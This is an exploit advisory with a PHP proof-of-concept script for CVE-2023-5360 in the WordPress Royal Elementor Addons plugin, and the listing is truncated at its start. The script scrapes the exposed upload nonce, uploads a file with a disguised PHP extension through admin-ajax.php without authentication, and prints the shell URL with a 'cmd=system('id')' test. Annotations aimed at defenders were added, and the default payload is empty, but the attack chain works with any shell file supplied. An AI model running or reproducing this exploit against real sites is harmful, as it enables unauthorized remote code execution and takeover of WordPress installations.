============================================================================================================================================= | # Title : WordPress Royal Elementor Addons 1.3.78 RCE | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360 [+] Summary : a security weakness in the Royal Elementor Addons plugin for WordPress related to improper validation of file upload requests and the exposure of a client-side nonce in the global JavaScript variable "WprConfig". The plugin registers an AJAX action used for uploading files associated with various UI elements. The weakness lies in: 1. Exposure of a file upload nonce inside the website’s HTML, accessible without authentication. 2. Incomplete server-side validation of file type and file origin. 3. Lack of authentication around the upload endpoint, which allows unauthorized requests to reach the handler. Theoretical attack sequence (documented for awareness): - Step 1: Attacker retrieves page HTML. - Step 2: Extracts nonce from `var WprConfig = {...}`. - Step 3: Sends crafted POST request to admin-ajax.php. - Step 4: Server incorrectly processes upload without capability checks. 
[+] poc : usage : php poc.php http://target/ [shell_file]
        // NOTE(review): this listing is truncated here — the opening `<?php` tag and
        // the head of safe_http_get() (presumably curl_init() and the CURLOPT_URL key
        // that `$url` below belongs to) are missing; what follows is the tail of its
        // curl_setopt_array() option list.
        $url,
        CURLOPT_RETURNTRANSFER => true,
        // TLS peer and host verification are switched off, so the fetch accepts any
        // certificate presented by the target.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT => 10
    ]);
    $resp = curl_exec($ch);
    curl_close($ch);
    // curl_exec() yields the response body as a string, or false on transport
    // failure; the caller only tests the result for truthiness.
    return $resp;
}

/* ----------------------------------------------------------------------
   Extract nonce from: var WprConfig = {...};
   ------------------------------------------------------------------------*/
/**
 * Fetch $target and read the "nonce" member of the inline
 * `var WprConfig = {...};` object that the summary above says the plugin
 * prints into public page HTML.
 *
 * Returns null when the fetch yields a falsy body, when the regex finds no
 * `var WprConfig = {...};` statement, or when the decoded object has no
 * "nonce" key. json_decode() only succeeds if the object literal is valid
 * JSON (quoted keys); a JS-style literal decodes to null and the `??`
 * operator then yields null without a warning.
 *
 * Defender note: a WordPress nonce is a CSRF token, not an authorization
 * check. Its exposure here only matters because, per the summary, the
 * upload handler performs no capability check — the fix belongs on the
 * server side, not in hiding the nonce.
 *
 * @param string $target base URL of the site to fetch
 * @return mixed the decoded "nonce" value, or null
 */
function get_nonce_from_target($target)
{
    $html = safe_http_get($target);
    if (!$html) return null;
    // Non-greedy match up to the first `};` — a nested object ending in `};`
    // would cut the capture short and make json_decode() fail (returns null).
    if (preg_match('/var\s+WprConfig\s*=\s*({.*?});/s', $html, $match)) {
        $json = json_decode($match[1], true);
        return $json["nonce"] ?? null;
    }
    return null;
}

/* ----------------------------------------------------------------------
   Generate Safe Default RCE Shell (Temp File)
   ------------------------------------------------------------------------*/
/**
 * Create the default local file that the main block later uploads.
 *
 * Writes sys_get_temp_dir()/indoushka_shell_<uniqid>.php. As listed,
 * $payload is the empty string, so the file written is empty — this copy of
 * the PoC ships no executable content. The temp file is never removed by
 * this script, and the return value of file_put_contents() is not checked.
 *
 * @return string path of the created file
 */
function generate_indoushka_shell()
{
    $path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php";
    $payload = '';
    file_put_contents($path, $payload);
    return $path;
}

/* ----------------------------------------------------------------------
   Upload PHP File using AJAX (ph_p mutated extension)
   ------------------------------------------------------------------------*/
/**
 * POST $file_path to the site's /wp-admin/admin-ajax.php as a multipart
 * form built from $fields (action, size/type hints, the nonce) plus the file
 * part "indoushkaed_file", renamed to "rce_mutated.ph_p" with a generic
 * octet-stream MIME type.
 *
 * Note that the request itself carries the extension it wants accepted
 * (allowed_file_types = "ph_p"); the summary above attributes the weakness
 * to the handler honouring such client-supplied values and checking no
 * capability. TLS verification is disabled, as in safe_http_get().
 *
 * Returns $json["data"]["url"] from the JSON response, or null when the
 * request fails, the body is not JSON, or that key is absent.
 *
 * Defender/detection note: the server-side fix is a fixed extension
 * allowlist that ignores client-sent type hints, together with a capability
 * check on the AJAX action (the nonce alone is insufficient). Unauthenticated
 * multipart POSTs to admin-ajax.php whose filename extension falls outside
 * the expected set are a clear log/WAF signal.
 *
 * @param string $target    base URL of the site
 * @param string $nonce     value returned by get_nonce_from_target()
 * @param string $file_path local file to send
 * @return string|null
 */
function indoushka_upload_shell($target, $nonce, $file_path)
{
    $ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php";
    $fields = [
        "action" => "wpr_addons_indoushka_file",
        "max_file_size" => 0,
        "allowed_file_types" => "ph_p",
        "triggering_event" => "click",
        "wpr_addons_nonce" => $nonce
    ];
    $file = [
        "indoushkaed_file" => curl_file_create(
            $file_path,
            "application/octet-stream",
            "rce_mutated.ph_p"
        )
    ];
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $ajax,
        CURLOPT_POST => true,
        // An array body makes cURL send multipart/form-data, which the
        // CURLFile entry requires.
        CURLOPT_POSTFIELDS => array_merge($fields, $file),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ]);
    $resp = curl_exec($ch);
    curl_close($ch);
    // A false/non-JSON $resp decodes to null; the `??` chain then yields null.
    $json = json_decode($resp, true);
    return $json["data"]["url"] ?? null;
}

/* ----------------------------------------------------------------------
   MAIN EXECUTION
   ------------------------------------------------------------------------*/
// CLI entry point: $argv[1] is the target base URL, optional $argv[2] is the
// path of a local file to upload instead of the generated temp file.
// Every failure path prints a message and exits with status 0 (bare `exit;`).
if ($argc < 2) {
    echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n";
    exit;
}
$target = $argv[1];
$custom_shell = $argv[2] ?? null;
echo "=== Royal Elementor Addons Full RCE PoC ===\n";
echo "[*] Extracting nonce from homepage...\n";
$nonce = get_nonce_from_target($target);
// A missing nonce is treated as "patched"; it can equally mean the fetch
// failed or the WprConfig literal was not valid JSON (see get_nonce_from_target()).
if (!$nonce) {
    echo "[-] Failed to extract nonce. Target may be patched.\n";
    exit;
}
echo "[+] Nonce found: $nonce\n";
/* Shell Selection */
// $custom_shell is tested for truthiness, so a path of "0" falls through to
// the generated file; the path is never checked for existence before upload.
if ($custom_shell) {
    echo "[*] Using provided shell: $custom_shell\n";
    $shell = $custom_shell;
} else {
    echo "[*] Generating default Indoushka RCE shell...\n";
    $shell = generate_indoushka_shell();
    echo "[+] Shell saved at: $shell\n";
}
echo "[*] Uploading shell via vulnerable AJAX handler...\n";
$url = indoushka_upload_shell($target, $nonce, $shell);
if ($url) {
    echo "[+] Shell uploaded successfully!\n";
    echo "[+] URL: $url\n";
    echo "[>] Test: {$url}?cmd=system('id');\n";
} else {
    echo "[-] Upload failed. Target may be protected or patched.\n";
}
// Informational only: a base64-encoded timestamp written to stdout; nothing
// further is sent to the target.
echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n";
// Everything after the closing tag below is outside PHP and is emitted
// verbatim to stdout when the script runs.
?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================